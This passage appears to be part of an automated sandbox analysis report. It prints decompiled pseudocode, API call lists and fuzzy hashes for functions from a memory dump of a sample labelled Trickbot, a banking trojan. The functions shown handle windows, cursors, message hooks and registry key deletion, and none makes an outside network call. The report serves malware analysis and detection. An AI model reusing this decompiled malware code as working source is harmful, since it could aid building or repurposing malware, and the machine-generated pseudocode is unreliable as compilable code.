                          				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
                          				return _t31;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0041AEF4
                          • GetTopWindow.USER32(?), ref: 0041AF1B
                          • GetDlgCtrlID.USER32(00000000), ref: 0041AF30
                          • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 0041AF89
                          • GetWindow.USER32(00000000,00000002), ref: 0041AFC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$CtrlH_prologMessageSend
                          • String ID:
                          • API String ID: 4125289812-0
                          • Opcode ID: a593015c0eee3eda3723142677cb0135c8808f5a6603c7bfcdee23bcedffa600
                          • Instruction ID: 1c3770068c8ded4160964aefbec3f80526a3820df74741eddc999ae44012b762
                          • Opcode Fuzzy Hash: a593015c0eee3eda3723142677cb0135c8808f5a6603c7bfcdee23bcedffa600
                          • Instruction Fuzzy Hash: 7931D671801104AECB25EBB5C9899EFBB75EF54300F20022FF411A3251EB784D86CA59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00415D5B(intOrPtr __ecx) {
                          				void* __esi;
                          				struct HWND__* _t40;
                          				void* _t42;
                          				void* _t50;
                          				intOrPtr _t63;
                          				signed int _t66;
                          				void* _t83;
                          
                          				_t63 = __ecx;
                          				E00405340(E004386A0, _t83);
                          				_push(__ecx);
                          				_push(__ecx);
                          				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
                          				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
                          				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
                          					L9:
                          					E00417F36( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
                          				} else {
                          					_t40 =  *(__ecx + 0x1c);
                          					if(_t40 == 0) {
                          						goto L9;
                          					} else {
                          						_t66 =  *0x447478; // 0x44748c
                          						 *(_t83 - 0x10) = _t66;
                          						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
                          						_t42 = E0041884D(_t83, GetParent(_t40));
                          						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E004181F7(_t83 - 0x10, _t83, 0x104)) >= 0) {
                          							E00418246(_t83 - 0x10, __eflags, 0xffffffff);
                          						} else {
                          							E00417E53(_t83 - 0x10, 0x104);
                          						}
                          						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
                          							L8:
                          							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
                          							E00417EC8(_t83 - 0x10);
                          							_t63 =  *((intOrPtr*)(_t83 - 0x14));
                          							goto L9;
                          						} else {
                          							_t50 = E0041884D(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
                          							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E004181F7(_t83 - 0x10, _t83, 0x104)) >= 0) {
                          								E00418246(_t83 - 0x10, __eflags, 0xffffffff);
                          								E00417C3D( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
                          								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
                          								E00417EC8(_t83 - 0x10);
                          							} else {
                          								E00417E53(_t83 - 0x10, 0x104);
                          								goto L8;
                          							}
                          						}
                          					}
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
                          				return  *((intOrPtr*)(_t83 + 8));
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00415D60
                          • GetParent.USER32(?), ref: 00415D9D
                          • SendMessageA.USER32(?,00000464,00000104,00000000), ref: 00415DC5
                          • GetParent.USER32(?), ref: 00415DEE
                          • SendMessageA.USER32(?,00000465,00000104,00000000), ref: 00415E0B
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageParentSend$H_prolog
                          • String ID:
                          • API String ID: 1056721960-0
                          • Opcode ID: df82b3c2bade386fb388a6cf614eb157c91b489a35e5a7e5095544e2ed3c16c8
                          • Instruction ID: a5d62ff2afa0c0fb4621ae06678bc6a3fb75691d3dca1708136b54179eb94b7a
                          • Opcode Fuzzy Hash: df82b3c2bade386fb388a6cf614eb157c91b489a35e5a7e5095544e2ed3c16c8
                          • Instruction Fuzzy Hash: 67316F7190061AEBCB14EFA5CC85EEEB774EF44328F10452EB421A71D1DB389E85CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00410D00(signed int _a8) {
                          				intOrPtr _v0;
                          				signed int _t28;
                          				struct HINSTANCE__* _t29;
                          				struct HHOOK__* _t30;
                          				signed int _t31;
                          				signed int _t33;
                          				signed int _t40;
                          				signed int _t42;
                          				signed int _t44;
                          				intOrPtr* _t45;
                          				signed int _t46;
                          				long _t48;
                          				signed int _t50;
                          
                          				if( *0x44d360 >= 0x30a) {
                          					__eflags =  *0x44d340;
                          					if( *0x44d340 != 0) {
                          						_t50 = _a8 | 0x00000001;
                          						__eflags = _t50 & 0x00000002;
                          						if((_t50 & 0x00000002) != 0) {
                          							_t50 = _t50 & 0xfffffffc;
                          							__eflags = _t50;
                          						}
                          						EnterCriticalSection(0x44d320);
                          						__eflags =  *0x44d39c - 0x80;
                          						if( *0x44d39c == 0x80) {
                          							L15:
                          							LeaveCriticalSection(0x44d320);
                          							__eflags = 0;
                          							return 0;
                          						} else {
                          							_t48 = GetCurrentThreadId();
                          							_t28 = 0;
                          							__eflags =  *0x44d39c - _t28; // 0x0
                          							if(__eflags <= 0) {
                          								L11:
                          								_t29 =  *0x44d35c; // 0x0
                          								_t30 = SetWindowsHookExA(5, E00411E60, _t29, _t48);
                          								__eflags = _t30;
                          								if(_t30 == 0) {
                          									goto L15;
                          								} else {
                          									_t46 =  *0x44d39c; // 0x0
                          									 *((intOrPtr*)((_t46 << 2) + 0x44d3a0 + (_t46 << 2) * 4)) = _v0;
                          									_t40 =  *0x44d39c; // 0x0
                          									 *((_t40 << 2) + 0x44d3a4 + (_t40 << 2) * 4) = _t48;
                          									_t42 =  *0x44d39c; // 0x0
                          									 *((_t42 << 2) + 0x44d3a8 + (_t42 << 2) * 4) = _t30;
                          									_t31 =  *0x44d39c; // 0x0
                          									 *((intOrPtr*)((_t31 << 2) + 0x44d3ac + (_t31 << 2) * 4)) = 1;
                          									_t33 =  *0x44d39c; // 0x0
                          									 *((_t33 << 2) + 0x44d3b0 + (_t33 << 2) * 4) = _t50;
                          									_t44 =  *0x44d39c; // 0x0
                          									 *0x44d394 = _t48;
                          									 *0x44d398 = _t44;
                          									 *0x44d39c =  *0x44d39c + 1;
                          									__eflags =  *0x44d39c;
                          									goto L13;
                          								}
                          							} else {
                          								_t45 = 0x44d3a4;
                          								while(1) {
                          									__eflags =  *_t45 - _t48;
                          									if( *_t45 == _t48) {
                          										break;
                          									}
                          									_t45 = _t45 + 0x14;
                          									_t28 = _t28 + 1;
                          									__eflags = _t28 -  *0x44d39c; // 0x0
                          									if(__eflags < 0) {
                          										continue;
                          									} else {
                          										goto L11;
                          									}
                          									goto L16;
                          								}
                          								 *((intOrPtr*)((_t28 << 2) + 0x44d3ac + _t36 * 4)) =  *((intOrPtr*)((_t28 << 2) + 0x44d3ac + _t36 * 4)) + 1;
                          								L13:
                          								LeaveCriticalSection(0x44d320);
                          								return 1;
                          							}
                          						}
                          					} else {
                          						__eflags = 0;
                          						return 0;
                          					}
                          				} else {
                          					return 0;
                          				}
                          				L16:
                          			}

                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03e794baa36fe8a4bb6ef4bedb02aba52e2c7310ff4c35b23995d853e79a78d7
                          • Instruction ID: c1136f55217e1c2a046085af44c6ec960e6274cae466e8b29d1a5754861e3a3d
                          • Opcode Fuzzy Hash: 03e794baa36fe8a4bb6ef4bedb02aba52e2c7310ff4c35b23995d853e79a78d7
                          • Instruction Fuzzy Hash: 3D3188B9F102109FD320DF5CF809A6277E0FB81B15B10857AED4A87665C7B85885CB1E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00426599(void* __esi, void* __eflags) {
                          				intOrPtr _v0;
                          				void* __ebp;
                          				intOrPtr _t4;
                          				struct HICON__* _t5;
                          				void* _t9;
                          				struct HICON__* _t12;
                          				signed short _t14;
                          				void* _t15;
                          				CHAR* _t18;
                          
                          				_t15 = __esi;
                          				E004330FA(9);
                          				_t4 = _v0;
                          				if(_t4 == 1 || _t4 >= 0x65 && _t4 <= 0x73) {
                          					_t14 = 0x7905;
                          					_t18 = 0x7f85;
                          					goto L13;
                          				} else {
                          					if(_t4 == 2 || _t4 >= 0xc9 && _t4 <= 0xd7) {
                          						_t14 = 0x7904;
                          						_t18 = 0x7f84;
                          						goto L13;
                          					} else {
                          						if(_t4 == 3 || _t4 >= 0x12d && _t4 <= 0x20d) {
                          							_t14 = 0x7903;
                          							_t18 = 0x7f86;
                          							L13:
                          							_t12 = 0;
                          							__eflags = _t14 -  *0x44b2d0; // 0x0
                          							if(__eflags == 0) {
                          								_t5 =  *0x44b2d8; // 0x0
                          							} else {
                          								_push(_t15);
                          								_t9 = E00432562();
                          								_t12 =  *0x44b2d4; // 0x0
                          								_t5 = LoadCursorA( *(_t9 + 0xc), _t14 & 0x0000ffff);
                          								__eflags = _t5;
                          								 *0x44b2d8 = _t5;
                          								 *0x44b2d4 = _t5;
                          								if(_t5 == 0) {
                          									_t5 = LoadCursorA(_t5, _t18);
                          									 *0x44b2d8 = _t5;
                          								}
                          								 *0x44b2d0 = _t14;
                          							}
                          							SetCursor(_t5);
                          							__eflags = _t12;
                          							if(_t12 != 0) {
                          								DestroyIcon(_t12);
                          							}
                          							goto L20;
                          						} else {
                          							SetCursor( *0x44b338);
                          							L20:
                          							return E0043316A(9);
                          						}
                          					}
                          				}
                          			}

                          APIs
                            • Part of subcall function 004330FA: EnterCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433135
                            • Part of subcall function 004330FA: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433147
                            • Part of subcall function 004330FA: LeaveCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433150
                            • Part of subcall function 004330FA: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011), ref: 00433162
                          • SetCursor.USER32(00000009), ref: 004265E2
                          • LoadCursorA.USER32(?), ref: 00426630
                          • LoadCursorA.USER32(00000000,00007F85), ref: 00426642
                          • SetCursor.USER32(00000000), ref: 00426658
                          • DestroyIcon.USER32(00000000), ref: 00426663
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalCursorSection$EnterLoad$DestroyIconInitializeLeave
                          • String ID:
                          • API String ID: 4129732340-0
                          • Opcode ID: d4f41a56feee133f44633a5163dd98598048a58c3b12695e6096929197b75f75
                          • Instruction ID: a0ce1a54e8a70548ad507ab5e5c62456ab7a962ed634c046a85497f02c770874
                          • Opcode Fuzzy Hash: d4f41a56feee133f44633a5163dd98598048a58c3b12695e6096929197b75f75
                          • Instruction Fuzzy Hash: 1A11B1B5B04224ABD7209B65FC89A2B379CF742304F66143BE505C72A1C7BCDC818B5E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 63%
                          			E0041A1F0(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
                          				struct tagRECT _v20;
                          				int _t21;
                          				struct HWND__* _t22;
                          				struct HWND__* _t41;
                          				void* _t42;
                          				intOrPtr* _t43;
                          
                          				_t42 = __ecx;
                          				_t21 = IsWindowVisible( *(__ecx + 0x1c));
                          				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
                          					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
                          				} else {
                          					_push(5);
                          					_push( *(_t42 + 0x1c));
                          					while(1) {
                          						_t22 = GetWindow();
                          						_t41 = _t22;
                          						if(_t41 == 0) {
                          							goto L7;
                          						}
                          						GetWindowRect(_t41,  &_v20);
                          						E0042147E(_t42,  &_v20);
                          						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
                          						_push(2);
                          						_push(_t41);
                          					}
                          				}
                          				L7:
                          				_t43 =  *((intOrPtr*)(_t42 + 0x34));
                          				if(_t43 != 0 && _a12 == 0) {
                          					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
                          				}
                          				return _t22;
                          			}

                          APIs
                          • IsWindowVisible.USER32(?), ref: 0041A1FE
                          • GetWindow.USER32(?,00000005), ref: 0041A21D
                          • GetWindowRect.USER32(00000000,?), ref: 0041A22A
                            • Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A23B), ref: 00421492
                            • Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A243), ref: 0042149B
                          • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 0041A255
                          • ScrollWindow.USER32(?,?,?,?,?), ref: 0041A26F
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$ClientScreen$RectScrollVisible
                          • String ID:
                          • API String ID: 1714389229-0
                          • Opcode ID: 13fbffe0ba96fa4b0df6ccf43a1f1761a05e91dc821f43cd405d82d8b47a8c66
                          • Instruction ID: 9483d244491325737e0f89e911a4ab211bac53ba3474b46da66f853519b6e94c
                          • Opcode Fuzzy Hash: 13fbffe0ba96fa4b0df6ccf43a1f1761a05e91dc821f43cd405d82d8b47a8c66
                          • Instruction Fuzzy Hash: 73216A32201209BFDF219F94DC48EBB7BB9FB48710F04852AF90696360E7759CA1DB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 29%
                          			E00431E2D() {
                          				signed int _t51;
                          				void* _t53;
                          
                          				E00405340(E004382B8, _t53);
                          				_t51 = RegOpenKeyA( *(_t53 + 8),  *( *(_t53 + 0xc)), _t53 - 0x14);
                          				if(_t51 != 0) {
                          					L8:
                          					RegCloseKey( *(_t53 - 0x14));
                          					 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                          					return _t51;
                          				}
                          				_push(0xff);
                          				_push(_t53 - 0x118);
                          				_push(_t51);
                          				_push( *(_t53 - 0x14));
                          				while(1) {
                          					_t51 = RegEnumKeyA();
                          					if(_t51 != 0) {
                          						break;
                          					}
                          					E00417F36(_t53 - 0x18, _t53, _t53 - 0x118);
                          					 *(_t53 - 4) =  *(_t53 - 4) & _t51;
                          					_push(_t53 - 0x18);
                          					_push( *(_t53 - 0x14));
                          					_t51 = E00431E2D();
                          					 *((char*)(_t53 - 0xd)) = _t51 != 0;
                          					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
                          					E00417EC8(_t53 - 0x18);
                          					if( *((char*)(_t53 - 0xd)) != 0) {
                          						break;
                          					}
                          					_push(0xff);
                          					_push(_t53 - 0x118);
                          					_push(0);
                          					_push( *(_t53 - 0x14));
                          				}
                          				if(_t51 == 0x103 || _t51 == 0x3f2) {
                          					_t51 = RegDeleteKeyA( *(_t53 + 8),  *( *(_t53 + 0xc)));
                          				}
                          				goto L8;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00431E32
                          • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00431E4B
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 00431E74
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00431EDD
                          • RegCloseKey.ADVAPI32(?), ref: 00431EE8
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CloseDeleteEnumH_prologOpen
                          • String ID:
                          • API String ID: 3131381098-0
                          • Opcode ID: 99e0d6c8b4b06a4ae5ccdd42ff655907d40d4397027c52b52596e22001da34e7
                          • Instruction ID: d8f1759deb82bb677c20337d83348239347245c2dc8dc760b821530747de5b27
                          • Opcode Fuzzy Hash: 99e0d6c8b4b06a4ae5ccdd42ff655907d40d4397027c52b52596e22001da34e7
                          • Instruction Fuzzy Hash: 62215E72C0012AABDF25DB94CC42AEFBBB8EF08350F005166FD55A72A0D7359E41DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0042D2A8(intOrPtr* __ecx, void* __ebp, signed int _a4) {
                          				void* _t21;
                          				signed char _t22;
                          				signed int _t40;
                          				intOrPtr* _t44;
                          				void* _t45;
                          				struct HWND__* _t47;
                          
                          				_t45 = __ebp;
                          				_t40 = _a4;
                          				_t44 = __ecx;
                          				if(_t40 != 0 && ( *(__ecx + 0x24) & 0x00000004) != 0) {
                          					E0041B815(__ecx, 0);
                          					return SetFocus(0);
                          				}
                          				_t21 = E0041884D(_t45, GetParent( *(_t44 + 0x1c)));
                          				if(_t21 != 0) {
                          					return _t21;
                          				} else {
                          					if(_t40 != 0) {
                          						_t22 =  *(_t44 + 0x24);
                          						_push(_t45);
                          						if((_t22 & 0x00000080) != 0) {
                          							 *(_t44 + 0x24) = _t22 & 0x0000007f;
                          							 *((intOrPtr*)( *_t44 + 0x8c))();
                          							_t47 =  *(_t44 + 0x1c);
                          							if(GetActiveWindow() == _t47) {
                          								SendMessageA(_t47, 6, 1, 0);
                          							}
                          						}
                          						if(( *(_t44 + 0x24) & 0x00000020) != 0) {
                          							SendMessageA( *(_t44 + 0x1c), 0x86, 1, 0);
                          						}
                          					} else {
                          						if( *((intOrPtr*)(_t44 + 0xa0)) == 0) {
                          							 *(_t44 + 0x24) =  *(_t44 + 0x24) | 0x00000080;
                          							 *((intOrPtr*)( *_t44 + 0x88))();
                          						}
                          					}
                          					asm("sbb edi, edi");
                          					return E0042D35E(_t44, ( ~_t40 & 0xfffffff0) + 0x20);
                          				}
                          			}

                          APIs
                          • SetFocus.USER32(00000000), ref: 0042D2C4
                          • GetParent.USER32(?), ref: 0042D2D2
                          • GetActiveWindow.USER32 ref: 0042D31E
                          • SendMessageA.USER32(?,00000006,00000001,00000000), ref: 0042D32F
                          • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 0042D344
                            • Part of subcall function 0041B815: EnableWindow.USER32(?,?), ref: 0041B823
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSendWindow$ActiveEnableFocusParent
                          • String ID:
                          • API String ID: 3951091596-0
                          • Opcode ID: 01b81ee88ece0940d13ea7f2b6d1eb7395b04c4b6aee473bc05e107433d5950f
                          • Instruction ID: 94b69f3912c84586d63b5872b0baf25ae8cfe2dd040671f2ff7e944a02e93575
                          • Opcode Fuzzy Hash: 01b81ee88ece0940d13ea7f2b6d1eb7395b04c4b6aee473bc05e107433d5950f
                          • Instruction Fuzzy Hash: 411129327017109BD730AF65EC88B5B77E9AF54714F54062EF986962D1CB78AC40C71D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E0042D35E(void* __ecx, signed int _a4) {
                          				struct HWND__* _t20;
                          				void* _t23;
                          				void* _t32;
                          				void* _t33;
                          				struct HWND__* _t34;
                          
                          				_t33 = __ecx;
                          				if((E0041B66F(__ecx) & 0x40000000) == 0) {
                          					_t32 = E00419EDA(__ecx);
                          				} else {
                          					_t32 = __ecx;
                          				}
                          				if((_a4 & 0x0000000c) != 0) {
                          					_t23 = E0041B7FA(_t32);
                          					if(( !_a4 & 0x00000008) == 0 || _t23 == 0 || _t32 == _t33) {
                          						SendMessageA( *(_t32 + 0x1c), 0x86, 0, 0);
                          					} else {
                          						 *(_t33 + 0x25) =  *(_t33 + 0x25) | 0x00000002;
                          						SendMessageA( *(_t32 + 0x1c), 0x86, 1, 0);
                          						 *(_t33 + 0x25) =  *(_t33 + 0x25) & 0x000000fd;
                          					}
                          				}
                          				_push(5);
                          				_push(GetDesktopWindow());
                          				while(1) {
                          					_t20 = GetWindow();
                          					_t34 = _t20;
                          					if(_t34 == 0) {
                          						break;
                          					}
                          					if(E0042D065( *(_t32 + 0x1c), _t34) != 0) {
                          						SendMessageA(_t34, 0x36d, _a4, 0);
                          					}
                          					_push(2);
                          					_push(_t34);
                          				}
                          				return _t20;
                          			}

                          APIs
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 0042D3B4
                          • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 0042D3C8
                          • GetDesktopWindow.USER32 ref: 0042D3CC
                          • GetWindow.USER32(00000000), ref: 0042D3D9
                          • SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 0042D3FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSendWindow$DesktopLong
                          • String ID:
                          • API String ID: 2272707703-0
                          • Opcode ID: 2beb82650e845792c7a9482f3e3f64514614eb6d422ef827a1529e378b278088
                          • Instruction ID: a1949cff4a9723ce3053a319633721de6bac2869e42685dadae143a23d4e7120
                          • Opcode Fuzzy Hash: 2beb82650e845792c7a9482f3e3f64514614eb6d422ef827a1529e378b278088
                          • Instruction Fuzzy Hash: 4A118C31B4072573E732DA25FC06F6F7A459F41750F44411AFA415A2D1CF99DC4282AF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 62%
                          			E00433344(void* __eflags, void* _a4) {
                          				char _v268;
                          				signed char* _t8;
                          				void* _t10;
                          				void* _t22;
                          				char* _t26;
                          
                          				_t26 = E004061F2(_a4);
                          				_t8 =  &(_t26[lstrlenA(_t26)]);
                          				if(_t8 != 0) {
                          					while(1) {
                          						 *_t8 =  *_t8 & 0x00000000;
                          						E00406AA0(_t26, _t8);
                          						_pop(_t22);
                          						if(RegOpenKeyA(0x80000000, _t26,  &_a4) != 0) {
                          							goto L7;
                          						}
                          						if(RegEnumKeyA(_a4, 0,  &_v268, 0x105) == 0) {
                          							_push(1);
                          							_pop(0);
                          						}
                          						RegCloseKey(_a4);
                          						if(0 == 0) {
                          							RegDeleteKeyA(0x80000000, _t26);
                          							_t8 = E00405F05(_t22, _t26, 0x5c);
                          							if(_t8 != 0) {
                          								continue;
                          							}
                          						}
                          						goto L7;
                          					}
                          				}
                          				L7:
                          				E004053B8(_t26);
                          				_t10 = 1;
                          				return _t10;
                          			}

                          APIs
                          • lstrlenA.KERNEL32(00000000), ref: 0043335C
                          • RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 0043337D
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00433399
                          • RegCloseKey.ADVAPI32(?), ref: 004333A9
                          • RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 004333B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CloseDeleteEnumOpenlstrlen
                          • String ID:
                          • API String ID: 160701936-0
                          • Opcode ID: bd9241ab598931815e592067fcab6f7eeaca3563938b95659ef57e96da0b5b31
                          • Instruction ID: 84eb8a883a421ca8b80f357d9c5ca2d7f650650da258fd514938724bd86cd58a
                          • Opcode Fuzzy Hash: bd9241ab598931815e592067fcab6f7eeaca3563938b95659ef57e96da0b5b31
                          • Instruction Fuzzy Hash: 8D01C4322005147EF7256F22EC49FAB3B6CDF057A6F11503BF900D8190DBA88D4189AC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E00423173(void* __eflags, intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
                          				signed int _t14;
                          				signed int _t22;
                          				intOrPtr* _t25;
                          				struct HWND__* _t27;
                          
                          				_t25 = _a4;
                          				_t27 = E00422F27(_t25, _a8);
                          				if( *_t25 != 0) {
                          					 *_a12 =  *_a12 | 0xffffffff;
                          				}
                          				_t22 = 0;
                          				L3:
                          				if((SendMessageA(_t27, 0x87, 0, 0) & 0x00000040) != 0) {
                          					_push(0);
                          					if( *_a4 == 0) {
                          						SendMessageA(_t27, 0xf1, 0 | _t22 ==  *_a12, ??);
                          					} else {
                          						if(SendMessageA(_t27, 0xf0, 0, ??) != 0) {
                          							 *_a12 = _t22;
                          						}
                          					}
                          					_t22 = _t22 + 1;
                          				}
                          				_t14 = GetWindow(_t27, 2);
                          				_t27 = _t14;
                          				if(_t27 == 0) {
                          					goto L11;
                          				}
                          				_t14 = GetWindowLongA(_t27, 0xfffffff0);
                          				if((_t14 & 0x00020000) == 0) {
                          					goto L3;
                          				}
                          				L11:
                          				return _t14;
                          			}

                          APIs
                          • SendMessageA.USER32(00000000,00000087,00000000,00000000), ref: 004231A5
                          • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 004231BB
                          • SendMessageA.USER32(00000000,000000F1,00000000,00000000), ref: 004231DB
